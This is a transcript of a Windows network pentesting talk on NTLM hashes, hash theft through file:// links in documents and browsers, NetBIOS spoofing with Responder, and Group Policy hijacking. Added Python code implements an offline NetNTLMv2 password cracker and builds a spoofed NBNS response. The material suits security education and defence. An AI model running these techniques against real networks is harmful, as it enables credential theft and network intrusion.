Your hash is mine!

E K
April 05, 2018


Talk on the Windows network authentication mechanism and Windows network pentesting
Topics:
- NTLM
- Authentication mechanism
- Hash cracking
- Hash Stealing
- Browsers and NTLM
- NetBIOS Spoofing
- Group Policy Hijacking


Transcript

  1. 3.

    Disclaimer

    The information and expressed opinions are provided for educational research purposes only. The author is not liable in any way for the actions of other parties. Everyone is fully responsible for their own actions.
  2. 4.

    Windows network problem

    I have a project on Windows network hacking features: «NTLM. Book of the Dead». I'm continuing Alexey Turin's work, «SMB Relay Bible». The project contains everything you may need to successfully pentest Windows networks (at least I think so :)).
  3. 5.

    Agenda

    - Theory: Windows hash - what is it? Authentication mechanism
    - Bruteforce
    - Hash stealing: Windows Explorer, crafted documents, browsers
    - NetBIOS spoofing
    - Group Policy hijacking
    - Toolz
  4. 6.
  5. 7.

    NTLM

    Working for:
    - Keeping passwords
    - Authentication
    - Single Sign-On
    Security impact:
    - Lots of Windows networks
    - Lots of tricks
    - You can gain control over servers and users
    - It's an easy way
  6. 8.

    Crypt: LM

    Example: 299BD128C1101FD6 (one 8-byte DES block; the full LM hash is two such blocks, 16 bytes)
    Algorithm:
    1. Convert all lower-case characters to upper case
    2. Truncate or NULL-pad the password to 14 characters
    3. Split the password into two 7-character chunks
    4. Create a DES key from each 7-character chunk (7 bytes = 56-bit key)
    5. DES-encrypt the constant string "KGS!@#$%" with each of the two keys
    6. Concatenate the two DES-encrypted blocks. This is the LM hash.
    Consequence: the hash is case-insensitive, unsalted, and each 7-character half can be cracked independently.
  7. 10.
  8. 11.

    NTLMv2

    Introduced in Windows NT 4.0 SP4; the default (LmCompatibilityLevel 3) since Windows Vista / Server 2008.
    Example (NetNTLMv2 as captured on the wire, hashcat mode 5600 format user::domain:SC:NTProofStr:blob):
    admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
    Algorithm:
    SC  = 8-byte server challenge, random
    CC  = 8-byte client challenge, random
    CC* = (X, time, CC2, domain name)   - the "blob": version/reserved bytes, timestamp, client challenge, target info
    v2-Hash = HMAC-MD5(NT-Hash, UPPERCASE(user name) || domain name)
    LMv2 = HMAC-MD5(v2-Hash, SC || CC)
    NTv2 = HMAC-MD5(v2-Hash, SC || CC*)
    response = LMv2 | CC | NTv2 | CC*
  9. 12.

    Bruteforce statistics (GPU)

    Hash type   | GeForce GTX 770 (512/2048 MB) | GeForce GTX 1080 (2048/8192 MB)
    NetNTLMv2   |       154.4 MH/s              |       1559.7 MH/s
    NetNTLMv1   |      1941.2 MH/s              |      21724.4 MH/s
    NTLM        |      3449.7 MH/s              |      35862.6 MH/s
    Thx @w34kp455 for statistics. Check weakpass.com (we use it).
  10. 13.

    Bruteforce statistics (CPU)

    Hash type   | Intel(R) Core(TM) i7-3520M 2.90GHz | Intel(R) Core(TM) i7-4790 3.60GHz
    NetNTLMv2   |          4.38 MH/s                 |         14.50 MH/s
    NetNTLMv1   |         27.87 MH/s                 |         72.43 MH/s
    NTLM        |         32.68 MH/s                 |         76.03 MH/s
    Thx @w34kp455 for statistics. Check weakpass.com (we use it).
  11. 14.

    Bruteforce statistics (GPU vs CPU)

    Hash type   | GeForce GTX 1080 (2048/8192 MB) | Intel(R) Core(TM) i7-4790 3.60GHz
    NetNTLMv2   |        1559.7 MH/s              |         14.50 MH/s
    NetNTLMv1   |       21724.4 MH/s              |         72.43 MH/s
    NTLM        |       35862.6 MH/s              |         76.03 MH/s
    Thx @w34kp455 for statistics. Check weakpass.com (we use it).
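Worked example for the NTLMv2 algorithm above and for the brute-force figures in these tables (an added example, not code from the talk or from the «NTLM. Book of the Dead» project): the NT hash (MD4 over the UTF-16LE password), the v2-Hash and NTProofStr, the user::domain:SC:NTProofStr:blob line that hashcat mode 5600 consumes, and an offline check of candidate passwords against such a line, which is exactly the work a cracker does per candidate. The user j.doe, domain CORP, the password, the challenges and the timestamp are constructed for the demo; MD4 is implemented inline because hashlib's md4 is missing on OpenSSL 3 builds without the legacy provider.

```python
# Added example (not from the talk): NT hash, NTLMv2 response and an offline
# candidate check for a NetNTLMv2 capture, standard library only.
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Implemented here because hashlib's md4 is absent on many
    OpenSSL 3 builds; the NT hash is MD4 of the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, tuple((i % 4) * 4 + i // 4 for i in range(16)), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, k, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4  # update a, d, c, b in turn
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(x, y, z) + X[order[i]] + k) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(nt: bytes, user: str, domain: str) -> bytes:
    # v2-Hash = HMAC-MD5(NT-Hash, UPPERCASE(user) || domain), both UTF-16LE
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    # CC* on the slide: version 1.1, reserved, FILETIME, CC, reserved, AV pairs, reserved
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def nt_proof(v2_hash: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    # NTv2 = HMAC-MD5(v2-Hash, SC || CC*); the wire response is NTv2 || CC*
    return hmac.new(v2_hash, server_challenge + blob, "md5").digest()


def hashcat_5600(user, domain, server_challenge, proof, blob) -> str:
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, candidates):
    """Recompute NTProofStr per candidate (one MD4 + two HMAC-MD5); return the match."""
    user, _, domain, sc, proof, blob = line.split(":")
    sc, proof, blob = bytes.fromhex(sc), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in candidates:
        guess = nt_proof(ntlmv2_hash(nt_hash(pw), user, domain), sc, blob)
        if hmac.compare_digest(guess, proof):
            return pw
    return None


def demo():
    """Constructed capture: user j.doe in domain CORP, password Summer2018! (all made up)."""
    user, domain, password = "j.doe", "CORP", "Summer2018!"
    sc = bytes.fromhex("0123456789abcdef")  # server challenge, constructed
    cc = bytes.fromhex("fedcba9876543210")  # client challenge, constructed
    # one AV pair (MsvAvNbDomainName = 2, 8 bytes of UTF-16LE) followed by the EOL pair
    target_info = b"\x02\x00\x08\x00" + domain.encode("utf-16-le") + b"\x00" * 4
    blob = build_blob(0x01D3CCD1B2D7E000, cc, target_info)  # FILETIME, constructed
    proof = nt_proof(ntlmv2_hash(nt_hash(password), user, domain), sc, blob)
    line = hashcat_5600(user, domain, sc, proof, blob)
    return line, crack_5600(line, ["password", "Winter2017!", "Summer2018!"])


if __name__ == "__main__":
    captured, found = demo()
    print(captured)
    print("cracked:", found)
```

Every candidate costs one MD4 plus two HMAC-MD5 computations keyed per user and domain, and the server challenge makes precomputation useless; that is why NetNTLMv2 sits an order of magnitude below raw NTLM in the tables above, and why the slow rate still falls to a good wordlist rather than to exhaustive search.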
  12. 15.
  13. 17.

    Files

    For local networks only.
    A document may embed references to files on an SMB share, e.g. a page at https://google.com that loads file://ip/mycats.jpg: opening it makes Windows authenticate to that share and hand over the user's NetNTLM response.
  14. 20.

    Browsers

    What browsers are we talking about? Internet Explorer, Edge.
    Scheme file:// and many, many HTML tags: <img> <link> <body> <table> <form>
    https://github.com/ShikariSenpai/Leak-NTLM-hash-via-HTML
  15. 21.
  16. 23.

    Why do we need all this?

    - User deanonymization
    - NTLM relay
    - Password brute force
    - User services: VPN, mail, SMB share, AD, PsExec (cmd), Microsoft account, ...
  17. 24.

    NetBIOS Spoofing

    NetBIOS Name Service. Let's resolve the «Batya» name: hosts file -> DNS -> NetBIOS.
    Root of the problem: the NetBIOS request is a broadcast, so anyone on the segment can respond to it and substitute their own address.
    https://github.com/SpiderLabs/Responder - we use Responder.
  18. 25.

    NetBIOS Spoofing

    - NTLM relay attack
    - Bruteforce!!!
    - NetBIOS spoofing, like DNS spoofing - back to the past:
      resolving a subdomain name (works for Win7): a non-existent subdomain such as asdfa.domain.name ends up being resolved via NetBIOS, so the attacker answers for a host inside domain.name
      - Cookie hijacking
      - Session fixation: Set-Cookie from aaa.domain.name -> domain.name
      - Cross-domain policies bypass: *.domain.name
      - Phishing
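The broadcast exchange both NetBIOS slides rely on, built and parsed offline (an added example, not the talk's code and not Responder's): the NBNS query a Windows host broadcasts for «BATYA», the positive response any host on the segment can inject for it, and the victim-side parser, which has nothing but the transaction ID and the name to match on. The 192.168.1.66 address and the TTL are constructed.

```python
# Added example (not from the talk or Responder): NBNS query / spoofed response, offline.
import random
import struct

NBNS_PORT = 137          # UDP, sent to the segment's broadcast address
NB_TYPE, IN_CLASS = 0x0020, 0x0001


def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001): the name is upper-cased and space-padded to
    15 bytes, the 16th byte is the suffix (0x00 = workstation), and every nibble is
    mapped to 'A'..'P'. The result is one 32-byte label followed by a 0 terminator."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytes(0x41 + nib for byte in raw for nib in (byte >> 4, byte & 0x0F))
    return bytes([len(encoded)]) + encoded + b"\x00"


def decode_nb_name(label: bytes):
    """Inverse of encode_nb_name; returns (name, suffix)."""
    length = label[0]
    enc = label[1:1 + length]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, length, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(name: str, txid=None) -> bytes:
    """The packet a Windows host broadcasts when hosts file and DNS have failed.
    Flags 0x0110: opcode QUERY, recursion desired, broadcast."""
    txid = random.randrange(0x10000) if txid is None else txid
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_nb_name(name) + struct.pack(">HH", NB_TYPE, IN_CLASS)


def build_spoofed_response(query: bytes, answer_ip: str, ttl: int = 165) -> bytes:
    """What any host on the segment can send back: echo the transaction ID and the
    name, claim authority (flags 0x8500: response, authoritative, recursion desired)
    and put our own address in RDATA. Nothing in the protocol authenticates this."""
    txid = struct.unpack(">H", query[:2])[0]
    qname = query[12:12 + query[12] + 2]       # length byte + label + terminator
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    nb_flags = 0x0000                          # unique name, B-node
    rdata = struct.pack(">H", nb_flags) + bytes(int(o) for o in answer_ip.split("."))
    return header + qname + struct.pack(">HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata


def parse_response(packet: bytes):
    """Victim-side view: return (txid, name, ip) from a positive response, else None.
    A real resolver only checks that txid and name match its outstanding query."""
    txid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", packet[:12])
    if not flags & 0x8000 or an == 0:
        return None
    off = 12
    for _ in range(qd):                        # skip an echoed question, if any
        off += packet[off] + 2 + 4
    name, _suffix = decode_nb_name(packet[off:])
    off += packet[off] + 2
    rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", packet[off:off + 10])
    off += 10
    if rtype != NB_TYPE or rclass != IN_CLASS or rdlen < 6:
        return None
    ip = ".".join(str(b) for b in packet[off + 2:off + 6])
    return txid, name, ip


if __name__ == "__main__":
    query = build_query("BATYA")                              # victim asks the segment
    answer = build_spoofed_response(query, "192.168.1.66")    # attacker answers first
    print("query   :", query.hex())
    print("response:", answer.hex())
    print("victim now resolves BATYA to", parse_response(answer)[2])
```

The only thing the victim can check is that the 16-bit transaction ID and the encoded name match what it just broadcast, and both were visible to everyone on the segment, so the first answer wins; that is the whole basis of the Responder attack and the reason the fix is to disable NetBIOS over TCP/IP (and the similar LLMNR fallback) rather than to filter responses.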
  19. 27.

    Group Policy Hijacking

    Group Policy is Microsoft's core infrastructure for managing the configuration of both users and computers in an enterprise Windows domain. Applying it uses:
    - DNS - to find the nearest domain controller
    - RPC - to establish a secure channel with the domain controller and make various RPC calls
    - LDAP - to query the high-level group policy configuration and which GPOs should be applied
    - SMB - to get the full GPO content for each applicable GPO
    GPOs are applied with SYSTEM privileges!
  20. 28.

    Group Policy Hijacking

    LDAP signing? SMB signing? Enabled by default only for AD (the domain controller side)! The cost: high load on the network.
  21. 29.

    Group Policy Hijacking

    [Diagram] The hacker sits between network 'A' (user) and network 'B' (domain controller): DNS, LDAP and RPC pass through to the real domain controller, SMB is redirected to a fake SMB server. Timeline on the slide: 20-90 min.
  22. 30.

    Tools

    - MWRLabs private scripts - ???? Those scripts are private! Hey!
    - Intercepter-NG - limited customization
    - Some other tools on GitHub?
  23. 31.

    Our Tool

    Path of least resistance:
    - Redirect SMB traffic - iptables
    - SMB ports and share - Samba
    - ARP spoofing - not included (use your favourite tool, e.g. arpspoof)
    - Payloads - Metasploit or your custom binary
    - Payload delivery method - Apache or SMB share
    https://github.com/whitel1st/GP_Hijack - 2 years ago
  24. 32.

    Warning!

    ARP spoofing is very destructive: use the attack on a small segment of the network (like 4 IPs).
    iptables redirects all SMB traffic (yep, that's too destructive as well).
    We need contributors who know how to pick out the right packets at a low level by policy-update signatures. What do you want? It's the path of least resistance :)
  25. 33.

    Where does it work?

    Windows version (systems with the latest updates): Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Vulnerable: No, No, No, No, ?, ? [table; which version carries which mark is not recoverable from the transcript]
  26. 34.

    Where does it work?

    Windows version (systems with the latest updates): Windows Server 2003, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
    Vulnerable: No, No, ?, ?, ?, ? [table; which version carries which mark is not recoverable from the transcript]
  27. 35.

    Out of scope

    - More Windows vulnerabilities
    - NTLM relay
    - Hash dumping
    - Horizontal privilege escalation
    - Vertical privilege escalation
    - Toolz-toolz-toolz
    - Anything else?
  28. 36.

    Useful links

    - Leak NTLM hash via HTML: https://github.com/ShikariSenpai/Leak-NTLM-hash-via-HTML
    - VladikSS on habrahabr: https://habrahabr.ru/post/306810
    - W.I.T.C.H., you can test your Windows VM/host: http://witch.valdikss.org.ru
    - Dictionaries for bruteforce: https://weakpass.com
    - Responder: https://github.com/SpiderLabs/Responder
    - GP_Hijack tool: https://github.com/whitel1st/GP_Hijack
  29. 37.

    Questions?

    @ShikariSenpai
    More information about the «NTLM. Book of the Dead» project will appear in my twitter.
    Special thx @w34kp455, @sergeybelove, @antyurin, @whitel1st, @igc_iv